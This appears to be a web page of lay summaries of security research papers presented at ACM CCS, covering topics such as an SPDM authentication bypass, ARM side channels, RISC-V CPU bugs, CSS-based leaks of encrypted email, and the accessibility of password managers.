The ACM Conference on Computer and Communications Security (CCS) is the flagship annual conference of the Special Interest Group on Security, Audit and Control (SIGSAC) of the Association for Computing Machinery (ACM). The conference brings together information security researchers, practitioners, developers, and users from all over the world to explore cutting-edge ideas and results.
When different groups want to train an AI model together, they must protect their data. One way is to add random noise to the calculations so that no one can see which data came from whom. There are two main options: either each group adds its own noise, which requires a lot of noise and makes results less accurate, or the noise is generated jointly in a secure computation, which keeps accuracy but has been very slow and communication-heavy until now.
The researchers present a new method to solve this. Instead of calculating the noise in a complex way, we propose that the noise is taken from pre-built tables that approximate the required randomness. This makes the process much faster and reduces communication. In our experiments, the new method was over 200 times faster than earlier approaches and still worked well with many participants. It is also flexible and can be used for different types of noise.
For society, this means that secure collaboration with sensitive data becomes easier. Different organizations can train AI models together without revealing private information, while still achieving good model accuracy.
The researchers conducted a comprehensive analysis of the Security Protocol and Data Model (SPDM) version 1.2, a standard supported by major technology companies to secure communication between hardware components and in cloud environments. While earlier studies examined only parts of the protocol, this work is the first to model and analyze the entire protocol with the Tamarin prover. Surprisingly, the analysis uncovered a severe vulnerability: in one operating mode, an attacker could bypass authentication completely. The team implemented the attack, reported it to the developers, and it was registered as a critical security issue (CVE, severity 9 out of 10).
The researchers then proposed a fix and produced the first formal security proof for the corrected version of the protocol. This fix has now been integrated into both the reference software and the official standard.
The study highlights that analyzing isolated parts of a security protocol is insufficient; only a holistic approach can reveal vulnerabilities caused by complex interactions. For society, this work strengthens trust in the security of IT infrastructure, particularly in cloud computing and secure hardware. It helps ensure that weaknesses are identified and resolved before they can be exploited on a large scale.
The researchers reveal that current state-of-the-art anti-facial recognition (AFR) defenses mainly evaluate against static facial recognition (FR) tracking strategies, which fail to reflect the capabilities of determined, adaptive attackers. To address this gap, they introduce DynTracker — a simple yet powerful attack method that dynamically updates its gallery database with newly detected images, enabling continuous tracking.
To defend against such adaptive threats, the authors propose DivTrackee, a system that enhances the diversity of AFR perturbations using text-guided image generation and mechanisms that explicitly reduce similarity among modified images. Experimental results show that while DynTracker completely bypasses existing AFR defenses, DivTrackee significantly mitigates attack success rates while maintaining high visual fidelity.
Overall, the study exposes the weaknesses of current AFR protections and highlights a more robust direction for preserving facial privacy against evolving recognition systems.
This study examines the security of web browsers, which execute countless scripts and programs from unknown sources every day. To reduce risks, modern browsers use software-based fault isolation (SFI), such as Google’s V8 heap sandbox, which protects billions of users by separating trusted data from an “untrusted” memory region.
The researchers point out that such mechanisms have seen little targeted testing so far. They therefore developed SbxBrk, a new testing tool that simulates realistic attackers by manipulating every memory access from trusted code into untrusted data. Applying this method to the V8 sandbox, they discovered 19 previously unknown vulnerabilities, including buffer overflows and memory errors that bypass the isolation.
The findings highlight that even widely deployed protections can contain flaws and must be systematically tested. For society, this means that improved testing methods are essential to ensure the long-term security of core applications like browsers and cloud services.
Modern smartphones, laptops, and cloud servers rely heavily on ARM processors. These chips are designed with hidden performance features, like caches, that are meant to be invisible to everyday software. Unfortunately, researchers have long known that these hidden features can sometimes “leak” secrets through subtle clues—often measured using very precise timers.
But what happens when such timers are unavailable, as is increasingly the case on modern ARM systems?
A research team from CISPA Helmholtz Center for Information Security and Google developed ExfilState, a tool that automatically uncovers ways processors can still unintentionally reveal secrets—even without timers. Instead of measuring time, ExfilState looks for tiny differences in how the processor’s visible state such as registers or errors behaves when its hidden cache is in different conditions.
By testing 160 devices across 37 ARM processor designs, the team discovered five previously unknown “side channels”—hidden ways for information to leak. Two of these are widespread and reliable across nearly all tested ARM processors. They showed that attackers could use them to steal cryptographic keys from widely used encryption software, launch new timer-free versions of attacks like Spectre, and even build new defenses that stop attacks by detecting when sensitive data leaves the cache.
This research team examined how blind and low-vision individuals manage their passwords and how password managers support them. The study was based on interviews with 33 participants. All respondents used password managers to some extent, mainly because of the convenience of storing and auto-filling credentials. However, the core security feature—generating strong, random passwords—was rarely adopted. The main reason was a lack of practical accessibility: many functions were difficult to use or felt unreliable for people with visual impairments.
As a result, participants reported a sense of reduced control. Some turned to insecure alternatives, such as reusing simple passwords or recording sensitive credentials in braille notes. These strategies show that while password managers can be useful, their design often does not fully meet the needs of this user group.
The researchers highlight that improving accessibility and involving blind and low-vision users more closely in the design process is crucial. This would allow password managers to realize their full potential: making secure, random passwords easy to use without limiting users’ sense of autonomy.
For society, the takeaway is clear: digital security can only be inclusive if tools are designed to be equally usable by everyone. Better accessibility not only benefits people with disabilities but also strengthens overall trust and safety in digital life.
The researchers examine how well current image safety classifiers detect harmful content such as violence, hate, or sexual material. Most existing models are trained on real-world images, while AI-generated images increasingly pose new challenges. To evaluate this, they built UnsafeBench, a benchmark with over 10,000 annotated images (real and AI-generated, across eleven categories). They tested five common classifiers and three vision-language models (VLMs). Results show that conventional classifiers cover only limited categories and perform significantly worse on AI-generated images. They are also more vulnerable to manipulations. VLMs like GPT-4V perform better overall but still miss cases, such as hateful symbols.
To address these shortcomings, the team developed PerspectiveVision, a fine-tuned model trained both on real-world and AI-generated data. It improves both detection accuracy and robustness against adversarial attacks.
The study makes clear that existing moderation tools are not sufficient to handle the growing risks of AI-generated harmful content. For society, this underscores the need for stronger safeguards to keep online platforms safe.
The authors study how the Document Object Model (DOM) — the data structure JavaScript uses to read and modify pages — can serve as an unexpected attack surface. They define and detect “DOM gadgets”: benign code fragments that consume DOM data and can lead to security-sensitive effects beyond classic script injection, such as hijacking outgoing requests, enabling CSRF, or manipulating the user interface. Using a hybrid static/dynamic analysis on the top 15k Tranco sites, the team analyzed 522k pages and 10.3 billion lines of JavaScript, identifying 2.6 million DOM-to-sink flows and verifying 357k gadget instances affecting roughly 15% of domains. They automatically found 657 gadgets with exploitable markup injection points across 37 sites, and observed that about 10% of flows lack validation or sanitization. The paper also presents four novel element-reordering techniques required to exploit a substantial subset of gadgets. The work highlights that treating DOM reads as trusted input is common but insufficiently defended. For society, this indicates the need for web developers, browser vendors, and standards bodies to reassess the DOM’s role in trust boundaries and adopt detection and mitigation tools to reduce real-world risks in everyday web applications.
The authors perform a differential evaluation of security-header parsing and enforcement across browsers. They run 177,146 parametrized tests for 16 headers across 16 browser configurations (covering >97% engine market share), amounting to over eleven million executions. They identify 5,606 inconsistent test outcomes (3.16%) and trace these to 42 root causes; 31 were previously unknown and resulted in 36 bug reports to browser vendors and specification authors, many of which produced fixes. The paper introduces a clustering method for outcome analysis and publishes the testing framework as open source to enable continuous vendor testing; a follow-up run on updated browsers confirmed several fixes but revealed four additional root causes. The study provides actionable evidence and tools to detect and remedy implementation divergences, thereby helping improve the consistency and practical effectiveness of web security headers.
The authors tackle a key challenge in securing networked embedded devices: existing rehosting fuzzers fail to penetrate complex, multi-layer network stacks and therefore miss deeply nested faults. They propose Pemu, a protocol-aware extension that actively probes firmware, parses outgoing low-level frames, infers addressing and protocol trees, and wraps raw fuzzing input into valid multi-layer packets so that fuzzed data reaches transport and application layers. Integrated with three rehosting fuzzers (Fuzzware, Hoedur, SEmu), Pemu increases average basic-block coverage by 40.7%, 39.2%, and 8.5% respectively, rediscovers known ENS vulnerabilities, and finds five previously unknown bugs. The implementation and dataset are published. This work advances automated, scalable testing of embedded network stacks and thereby helps reduce the risk posed by software faults in connected devices.
The authors address a bottleneck in automated verification of security protocols that involve loops or inductive structures, where tools like Tamarin can fail to terminate or require many manual auxiliary lemmas. They adapt cyclic proofs to Tamarin’s constraint-reduction setting: they formalize the approach, add controlled structural rules (weakening and cut), prove soundness, and develop heuristics for efficient backlink discovery. Their implementation yields more compact, automated proofs; across fourteen case studies — up to a detailed Signal model — many lemmas are proved without or with far fewer auxiliary lemmas (including message secrecy for Signal). The contribution improves automation for protocols with looping behavior. For society, this advances the practical ability to formally verify and thereby increase confidence in the security of communication protocols.
Every processor follows a specification called the Instruction Set Architecture (ISA). The ISA defines the basic instructions (like add, load, store) that software can use. RISC-V is an open ISA, meaning anyone can design their own compatible CPU. This openness has fueled a wave of new processors for laptops, servers, and embedded devices.
But while the specification is open, the designs of most actual CPUs remain proprietary—just like x86 or ARM processors. That makes it difficult for researchers to inspect them for hidden flaws.
A research team at CISPA developed RISCover, a tool that automatically checks real RISC-V CPUs for design errors without needing access to their internals. RISCover runs small test programs and compares results across different CPUs; if one behaves differently from the others, this often points to a bug or vulnerability.
When tested on eight widely used CPUs, RISCover uncovered four serious flaws. The most critical, named GhostWrite (CVE-2024-44067), allows unprivileged software to overwrite physical memory and take full control of a system. The team also discovered instruction sequences that can instantly freeze a processor, creating a powerful denial-of-service attack.
Since hardware flaws cannot be fixed as easily as software bugs, early detection is vital. By revealing such vulnerabilities before attackers can exploit them, RISCover strengthens the security of the rapidly growing RISC-V ecosystem.
The research team studied how U.S. companies report on employee cybersecurity training in their official SEC 10-K filings. These are annual reports that publicly traded companies must submit to the U.S. Securities and Exchange Commission, covering finances, risks, and business practices. Since late 2023, they also include a section on cybersecurity.
From thousands of filings, the team found that about 78% of companies provide security awareness training. Some gave only vague statements, while others described detailed or mandatory programs. Employees were often portrayed as the weak link, easy to trick or posing insider risks. A smaller share of companies also mentioned measures such as multi-factor authentication (11%) or channels for reporting suspicious behavior (8%).
Companies that follow a cybersecurity framework developed by the National Institute of Standards and Technology (NIST), a U.S. government agency, were more likely to combine training with extra safeguards. Practices also varied by company size and industry.
This is the first large independent study to show how widespread cybersecurity training is in U.S. firms. The results give managers, CISOs, and policymakers a clearer picture for decisions and can help society invest more effectively in cybersecurity. All data and code were published to allow full replication of the study.
Encrypted emails are designed to keep sensitive information private, ensuring that only the sender and recipient can read them. Yet, researchers at CISPA have shown that attackers can still trick email clients into leaking secret messages.
The attack abuses CSS—the styling rules normally used to control fonts and layouts—to recover the full content of an encrypted email. By combining features such as custom fonts, container queries, and animations, the researchers demonstrate how each character of a decrypted message can be invisibly mapped to a network request. As soon as the victim opens the email, these requests silently transmit the text to the attacker, without requiring any interaction or showing any warning signs.
This research highlights that the real weakness lies not in the encryption itself but in how email clients handle formatting. The work establishes that CSS must be considered a serious security risk and calls for stronger content isolation in email clients. The research project led to changes in major software projects, including updates to Mozilla Thunderbird and Meta's Code Verify.
Cryptography competitions often contribute to the development and standardization of new cryptographic schemes. They help se- lect primitives and algorithms that solve specific cryptographic problems securely and efficiently from a list of candidate submis- sions. Over the last decades, several competitions held by NIST and other research and regulatory organizations resulted in standards for, e.g., symmetric and asymmetric encryption, hashing, digital signatures, and, most recently, quantum-secure cryptography. How- ever, while these competitions fostered much technical research on the submitted schemes, little is currently known about the human aspects of their processes, how they shape the competition results, and their perceived impact on cryptography security. To investigate human aspects of cryptography competitions, we interviewed 20 experienced cryptography competition participants about their experiences, their assessment of the competitions’ im- pact and its determinants, and their suggestions for future events. We find that competitions bring attention to a cryptography area, provide research focus and motivation, and establish trust in schemes through community scrutiny and collaboration. Our par- ticipants highlighted the criticality of transparency, fairness, and trustworthiness of the competition organizer, emphasizing a need for clear and open communication. Based on these findings, we suggest strategies for future competitions to maximize engagement and provide transparent, trustworthy processes and results. We rec- ommend stronger moderation of social conduct on official channels to ensure fairness and prevent putting off potential contributors. We also find that substantial industry involvement and systematic feedback collection are critical. Transparent organization and eval- uation elevate the competition and foster secure and well-adopted standards.